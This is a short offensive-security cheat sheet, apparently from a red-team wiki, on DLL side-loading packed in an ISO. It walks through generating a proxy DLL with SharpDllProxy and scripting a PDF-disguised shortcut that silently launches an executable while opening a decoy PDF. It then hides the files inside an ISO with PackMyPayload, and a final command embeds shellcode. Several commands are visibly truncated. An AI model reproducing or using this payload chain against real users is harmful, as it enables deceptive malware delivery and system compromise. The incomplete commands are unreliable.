Comment on page

DLL Hijacking

DLL Side-Loading with ISO Packing

Generate a proxy DLL with SharpDLLProxy:
Cmd > SharpDllProxy.exe --dll C:\Windows\System32\version.dll --payload OneDrive.Update
Cmd > move output_version\tmp1F94.dll C:\out\vresion.dll
Create a malicious link (also here):
$obj = New-object -ComObject
$link = $obj.createshortcut("C:\Tools\PackMyPayload\out\clickme.lnk")
$link.windowstyle = "7"
$link.targetpath = "%windir%/system32/cmd.exe"
$link.iconlocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13" # PDF ico
$link.arguments = "/c start update.exe & ""%ProgramFiles(x86)%/Microsoft/Edge/Application/msedge.exe"" %cd%/fake.pdf"
Pack all the files into an ISO with PackMyPayload:
PS > python .\ .\out\ .\out\a.iso --out-format iso --hide OneDriveStandaloneUpdater.exe,vresion.dll,version.dll,fake.pdf



$ ./ -p RuntimeBroker.exe -d -dp vresion.dll -o version.dll -s domain -sa megacorp.local shellcode.bin
Last modified 2mo ago